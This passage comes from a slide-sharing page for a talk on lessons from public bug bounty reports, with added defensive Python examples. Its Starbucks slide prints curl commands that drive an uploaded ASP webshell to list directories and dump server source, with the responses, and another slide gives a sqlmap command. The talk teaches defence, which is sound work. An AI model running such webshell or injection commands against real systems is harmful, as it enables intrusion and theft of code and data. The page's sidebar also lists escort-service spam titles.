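    """Return ref if it is a plausible git ref name and, the point of this example,
    cannot be mistaken for a command-line option."""
    if not ref or ref.startswith("-"):
        raise ValueError("ref must not be empty or start with '-'")
    if _FORBIDDEN.search(ref) or ref.startswith("/") or ref.endswith((".", "/", ".lock")):
        raise ValueError("ref contains characters git does not allow")
    return ref


def git_log_argv(repo_path, ref, path):
    """argv for listing commits touching path on ref. Fixed options come first, the
    validated ref next, and '--' guarantees path is never read as a revision or option."""
    return ["git", "-C", repo_path, "log", "--format=%H", validate_ref(ref), "--", path]


def git_log(repo_path, ref, path):
    """Run the validated command without a shell and return the commit hashes."""
    out = subprocess.run(git_log_argv(repo_path, ref, path),
                         capture_output=True, text=True, check=True)
    return out.stdout.split()


def ref_rejected(ref):
    try:
        validate_ref(ref)
        return False
    except ValueError:
        return True
```

For a real deployment, also run `git check-ref-format` (or the library's equivalent) as the authority on valid names; the regex here exists so the leading-dash rule is enforced before anything reaches git at all.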
???
$12,000
14 / 22
Remote Code Execution (RCE)
https://hackerone.com/reports/506646
RCE
Webshell via File Upload on ecjobs.starbucks.com.cn
1. Sign in at the url (https://ecjobs.starbucks.com.cn) and go to the resume endpoint.
2. Use burp suite tools to intercept the avatar upload request.
3. Change the filename extension from .jpg to .asp with a space character behind it, and modify the content
After that you have uploaded malicious files on the server and can run any os command on the server you want.
RCE
curl 'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=dir%20d:TrustHXSTBKSERM101www_app%20%2fd%2fs%2fb'
HTTP/1.1 200 OK
Date: Fri, 08 Mar 2019 02:56:19 GMT
Server: wswaf/2.13.0-5.el6
…
Content-Length: 1814533
<html>
<body>
<h1>POC by hackerone_john stone</h1>
<textarea readonly cols=80 rows=25>
d:TrustHXSTBKSERM101www_appbin
d:TrustHXSTBKSERM101www_appcommon
d:TrustHXSTBKSERM101www_appconcurrent_test
d:TrustHXSTBKSERM101www_appDefault.aspx
d:TrustHXSTBKSERM101www_appGlobal.asax
d:TrustHXSTBKSERM101www_apphximages_v6
....................................
</textarea>
</body>
</html>
RCE
curl $'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=type%20d:TrustHXSTBKSERM101www_appconcurrent_testnew_application_concurrent_test__svc.cs'
HTTP/1.1 200 OK
Date: Fri, 08 Mar 2019 03:37:39 GMT
…
Connection: close
Content-Length: 33316
<html>
<body>
<h1>POC by hackerone_john stone</h1>
<textarea readonly cols=80 rows=25>
using System;
using System.Collections.Generic;
using System.ComponentModel;
…
using hxmd = TrustHX.HXMD6;
class new_application_concurrent_test : IHXPageXmlService
{
#region IHXPageXmlService
…
case "CONCURRENT_TEST": return ConcurrentTest.ConcurrentTestProcess(strSystemCode, strPageXmlServiceContent);
default:
string strErrorMessageText =
....................................
</textarea>
</body>
</html>
RCE
Recommendations:
• Input Validation
• Lock down anything with files closely
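The upload above got through on a trailing space: the extension check saw ".asp " and passed it, the filesystem stored ".asp" and the server executed it. The added example below (not the site's code) is the upload validation the recommendation calls for: strip trailing spaces and dots before examining the extension, allow only image extensions, confirm the bytes really are that image type, and store under a server-generated name so nothing from the client reaches the filesystem path. The allowed types and magic bytes are standard; the sample uploads are constructed.

```python
import unicodedata
import uuid

# Allowed extension -> leading bytes (magic) that content of that type must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}


def sanitize_extension(filename):
    """Return the lower-cased extension if it is allowed. Trailing spaces and dots are
    stripped first because Windows/IIS drop them on save, which is what 'avatar.asp ' relies on."""
    name = unicodedata.normalize("NFKC", filename)
    base = name.replace("\\", "/").rsplit("/", 1)[-1]   # ignore any directory part
    if "\x00" in base:
        raise ValueError("NUL byte in filename")
    base = base.rstrip(" .")
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or not stem or ext not in ALLOWED:
        raise ValueError("extension %r not allowed" % ext)
    return ext


def store_avatar(filename, data):
    """Validate the extension, check the content matches it, and return the name to store
    under: random, server-chosen, with the validated extension."""
    ext = sanitize_extension(filename)
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match declared image type")
    return "%s.%s" % (uuid.uuid4().hex, ext)


def upload_rejected(filename, data):
    try:
        store_avatar(filename, data)
        return False
    except ValueError:
        return True


# Constructed sample uploads.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 32
SCRIPT_SAMPLE = b"<% constructed non-image content %>"
```

Serving the upload directory with script execution disabled is the other half of "lock down anything with files": even a validation slip then yields a download, not a shell.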
???
$4,000
15 / 22
Insecure Design
https://hackerone.com/reports/574638
Insecure Design
“When requesting a ride, it was possible to intercept the request and forward it with 3 random characters at the end of the paymentProfileUuid parameter.
This would cause the ride to disappear from both the Rider and Driver's trip history, the Rider would not be charged, and the Driver would not receive payment for the trip.”
Insecure Design
Recommendations:
• Input Validation
• Appropriate Monitoring
• Fraud Detection
???
$1,500
16 / 22
SQL Injection (sqli)
https://hackerone.com/reports/390879
Sqli
Steps to Reproduce:
1. python sqlmap.py -u https://REPLACE-ME/public/saveCount.cfm?countID=4 --level=3 --risk=3
Impact
Attacker can take control over the database server.
Sqli
Recommendations:
1. Use modern frameworks and libraries
2. Build safe APIs
3. Scan with SAST
4. Scan with DAST (sqlmap)
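"Build safe APIs" means the countID from the query string never becomes part of the SQL text. The added example below (not the reported application's code; a saveCount-style counter table is constructed in an in-memory SQLite database) shows the string-built update beside the parameterized one and counts how many rows each touches, which is what a DAST tool like sqlmap is probing for.

```python
import sqlite3


def make_db():
    """Constructed table: one row per page counter."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE counts (countID INTEGER PRIMARY KEY, hits INTEGER NOT NULL)")
    db.executemany("INSERT INTO counts VALUES (?, ?)", [(1, 10), (2, 20), (4, 40)])
    db.commit()
    return db


def save_count_vulnerable(db, count_id):
    """String-built SQL: countID comes straight from the query string into the statement."""
    cur = db.execute("UPDATE counts SET hits = hits + 1 WHERE countID = " + count_id)
    db.commit()
    return cur.rowcount


def save_count_safe(db, count_id):
    """Type-check the input, then bind it as a parameter; the value can never alter the query shape."""
    try:
        cid = int(count_id)
    except ValueError:
        raise ValueError("countID must be an integer") from None
    cur = db.execute("UPDATE counts SET hits = hits + 1 WHERE countID =  ?", (cid,))
    db.commit()
    return cur.rowcount


def rows_touched(handler, count_id):
    """Run handler against a fresh database; -1 means the input was rejected."""
    db = make_db()
    try:
        return handler(db, count_id)
    except ValueError:
        return -1
    finally:
        db.close()


if __name__ == "__main__":
    for cid in ("4", "4 OR 1=1"):
        print(repr(cid), rows_touched(save_count_vulnerable, cid), rows_touched(save_count_safe, cid))
```

The typed parameter is what the "modern frameworks" bullet buys you by default; the explicit int() is there so a non-numeric value is a logged 400, not a database error message leaking schema to the scanner.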
???
$0
17 / 22
Hardcoded Token
https://hackerone.com/reports/396467
Hardcoded Token
“GitHub is a truly awesome service but it is unwise to put any sensitive data in code that is hosted on GitHub and similar services, as I was able to find a github token indexed 7 hours ago by user ██████ - Software Engineer - Snap Inc”
Hardcoded Token
“I know it’s not my right to ask, just out of curiosity, what was the impact of the above if it reached bad hands? Doesn’t the google authentication somehow protect the access to this site even with the token leaked?
The web interface needed a valid snap account, but not the API.”
Hardcoded Token
Recommendations:
• Don’t hardcode tokens
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded tokens (git-secrets, gitleaks, gitrob, trufflehog)
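Both the Hardcoded Key (JumpCloud API key) and Hardcoded Token (GitHub token) cases above end with the same recommendation: run a secret scanner over what you commit. As an added example (not any of the named tools, whose rule sets are far larger and add entropy checks), the scanner below applies a few well-known token shapes plus a generic "api key = value" rule to file text and reports redacted hits with line numbers, suitable for a pre-commit hook. The sample file content is constructed; none of the values are real credentials (the AWS one is the documented example key).

```python
import re

# A few well-known token shapes plus a generic "api key = value" form.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "generic_api_key": re.compile(r"(?i)(?:api[_-]?key|x-api-key)\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{24,})"),
}


def redact(secret):
    """Keep just enough to locate the value in the file without re-leaking it."""
    return secret[:4] + "..." + secret[-2:] if len(secret) > 8 else "***"


def scan_text(text, source="<memory>"):
    """Return (source, line_no, rule, redacted_match) for every hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                secret = m.group(m.lastindex) if m.lastindex else m.group(0)
                hits.append((source, line_no, rule, redact(secret)))
    return hits


def scan_file(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return scan_text(f.read(), source=path)


# Constructed file content resembling what a public repository search turns up.
SAMPLE = """# deploy settings (constructed example, none of these values are real)
JUMPCLOUD_API_KEY = "k3yExampleExampleExampleExample00"
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
export GITHUB_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
log_level = debug
"""


if __name__ == "__main__":
    import sys
    findings = scan_text(SAMPLE) if len(sys.argv) == 1 else [h for p in sys.argv[1:] for h in scan_file(p)]
    for source, line_no, rule, shown in findings:
        print("%s:%d: %s %s" % (source, line_no, rule, shown))
    sys.exit(1 if findings else 0)
```

The non-zero exit is the point of running it before a push: a finding blocks the commit, which is cheaper than the rotation and incident review that follow a public index hit.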
???
$15,000
18 / 22
Insecure Design
https://hackerone.com/reports/442901
Insecure Design
When a user creates an account using Google or Facebook and does not set an additional password, it is possible to set their password via CSRF.
Since the account is created using a social media account, no existing-password check is needed and the CSRF check on the endpoint is broken.
An attacker can take over accounts created using Google or Facebook.
Insecure Design
Recommendations:
• Input Validation
• Consider cross-feature impacts
???
19 / 22
Insecure Design
https://hackerone.com/reports/202781
Insecure Design
Chained Bugs to Leak Victim's Uber FB OAuth Token
1. Prompt OAuth authorization on facebook.com
2. Redirect to https://auth.uber.com/login?next_url=https://login.uber.com/logout from Facebook
3. Redirect to https://login.uber.com/logout from auth.uber.com
4. Redirect to attacker site from Referer header and return the token
When combined, this would have allowed for a full account takeover
Insecure Design
Recommendations:
• Input Validation
• Consider cross-feature impacts
???
$7,500
20 / 22
Account Takeover
https://hackerone.com/reports/143717
Account Takeover
“Through the endpoint at /rt/users/passwordless-signup it is possible to change the password of any Uber user, given knowledge of their phone number (or by just enumerating phone numbers until one is found that is registered with Uber - not too hard given the number of Uber users).”
Account Takeover (screenshot slide)
Account Takeover
Recommendations:
• Authenticate / re-authenticate important activities
• Consider behavioral analysis
???
$10,000
21 / 22
Insecure Design
https://hackerone.com/reports/155618
Insecure Design
“There is a vulnerability in Vimeo which allows any user to watch a passworded video without the password.
A user can like a passworded video without the password, then the user can watch the video on Couchmode without the password.”
Insecure Design (screenshot slide)
Insecure Design
Recommendations:
• Carefully consider interactions across features
• Don’t actually depend on security by obscurity
• Emit as little metadata as possible
???
$500
22 / 22
Insecure Design
https://hackerone.com/reports/218230
Insecure Design
“I found a way to become a verified GitLab team member on Slack. By doing so, I gained access to dozens of channels possibly containing sensitive information. ”
Insecure Design (screenshot slides)
Insecure Design
Recommendations:
• Threat Model your applications
• Consider a bug bounty
• Hire smart people
???
$0
So … what now?
There is hope …
• Follow security design principles
• Keep knowledge current
• Spend effort throughout SDLC
• Focus on key controls (2fa, input validation)
• Work on prevention, but also detection and response
• Patch
• (try bug bounties - make some extra $)
Questions
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com

DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsDevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsAmazon Web Services
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?Nathan Van Gheem
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsFederico Michele Facca
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesSysdig
 
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfChristopher Doman
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?Ksenia Peguero
 

Similar to Watch How The Giants Fall: Learning from Bug Bounty Results (20)

ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdfITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Fall
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Appsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation SlidesAppsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation Slides
 
Protecting your organization against attacks via the build system
Protecting your organization against attacks via the build systemProtecting your organization against attacks via the build system
Protecting your organization against attacks via the build system
 
Security for cloud native workloads
Security for cloud native workloadsSecurity for cloud native workloads
Security for cloud native workloads
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
How to secure your web applications with NGINX
How to secure your web applications with NGINXHow to secure your web applications with NGINX
How to secure your web applications with NGINX
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
 
DevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsDevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platforms
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in Kubernetes
 
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
 

More from jtmelton

AllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorAllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorjtmelton
 
Building an AppSec Program From the Ground Up: An Honest Retrospective
Building an AppSec Program From the Ground Up:  An Honest RetrospectiveBuilding an AppSec Program From the Ground Up:  An Honest Retrospective
Building an AppSec Program From the Ground Up: An Honest Retrospectivejtmelton
 
Towards Securing Micro-Services
Towards Securing Micro-ServicesTowards Securing Micro-Services
Towards Securing Micro-Servicesjtmelton
 
AppSensor CodeMash 2017
AppSensor CodeMash 2017AppSensor CodeMash 2017
AppSensor CodeMash 2017jtmelton
 
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016jtmelton
 
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016jtmelton
 
AppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and ResponseAppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and Responsejtmelton
 

More from jtmelton (7)

AllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensorAllDayDevOps 2019 AppSensor
AllDayDevOps 2019 AppSensor
 
Building an AppSec Program From the Ground Up: An Honest Retrospective
Building an AppSec Program From the Ground Up:  An Honest RetrospectiveBuilding an AppSec Program From the Ground Up:  An Honest Retrospective
Building an AppSec Program From the Ground Up: An Honest Retrospective
 
Towards Securing Micro-Services
Towards Securing Micro-ServicesTowards Securing Micro-Services
Towards Securing Micro-Services
 
AppSensor CodeMash 2017
AppSensor CodeMash 2017AppSensor CodeMash 2017
AppSensor CodeMash 2017
 
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
Building Self-Defending Applications With OWASP AppSensor JavaOne 2016
 
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
AppSensor Near Real-Time Event Detection and Response - DevNexus 2016
 
AppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and ResponseAppSensor - Near Real Time Event Detection and Response
AppSensor - Near Real Time Event Detection and Response
 

Recently uploaded

notes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptnotes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptMsecMca
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756dollysharma2066
 
Unit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfUnit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfRagavanV2
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTbhaskargani46
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptDineshKumar4165
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01KreezheaRecto
 
Intro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfIntro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfrs7054576148
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoordharasingh5698
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptThermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptDineshKumar4165
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringmulugeta48
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfKamal Acharya
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Standamitlee9823
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 

Recently uploaded (20)

notes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.pptnotes on Evolution Of Analytic Scalability.ppt
notes on Evolution Of Analytic Scalability.ppt
 
NFPA 5000 2024 standard .
NFPA 5000 2024 standard                                  .NFPA 5000 2024 standard                                  .
NFPA 5000 2024 standard .
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Unit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdfUnit 2- Effective stress & Permeability.pdf
Unit 2- Effective stress & Permeability.pdf
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Netaji Nagar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering  Unit - I & II . pptThermal Engineering  Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Palanpur 7001035870 Whatsapp Number, 24/07 Booking
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Intro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdfIntro To Electric Vehicles PDF Notes.pdf
Intro To Electric Vehicles PDF Notes.pdf
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Thermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.pptThermal Engineering -unit - III & IV.ppt
Thermal Engineering -unit - III & IV.ppt
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced LoadsFEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
FEA Based Level 3 Assessment of Deformed Tanks with Fluid Induced Loads
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night StandCall Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
Call Girls In Bangalore ☎ 7737669865 🥵 Book Your One night Stand
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 

Watch How The Giants Fall: Learning from Bug Bounty Results